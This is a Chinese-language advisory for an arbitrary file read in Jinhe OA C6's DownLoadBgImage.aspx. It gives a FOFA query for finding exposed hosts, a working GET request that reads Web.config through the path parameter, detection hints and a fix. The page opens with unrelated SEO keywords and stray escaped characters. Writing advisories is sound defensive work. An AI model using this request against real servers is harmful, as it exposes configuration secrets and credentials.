怎样让网站被百度收录,网站建设实训总结报告,保定建设工程信息网,说说seo论坛金和OA C6 DownLoadBgImage任意文件读取漏洞
漏洞描述
金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统#xff0c;主要应用于企业资源规划#xff08;ERP#xff09;、客户关系管理#xff08;CRM#xff09;以及办公自动化#xff08;OA#xff09…金和OA C6 DownLoadBgImage任意文件读取漏洞
漏洞描述
金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统主要应用于企业资源规划ERP、客户关系管理CRM以及办公自动化OA等领域。金和OA C6 接口JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx 其参数path存在文件遍历漏洞可读取系统任意文件造成信息泄露。
威胁等级: 高危
漏洞分类: 信息泄露
涉及厂商及产品金和C6
应用指纹及检出思路
此用存在二次开发的可能性接口存在JHSoft 关键词可大致判断
fofabodyJHSoft.Web.AddMenu || app金和网络-金和OA
漏洞复现
GET /C6/JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx/?path/C6/Web.config HTTP/1.1 Host: 检测思路
检测web.config关键字段即可。如 等。
修复建议
设置访问控制策略禁用此接口
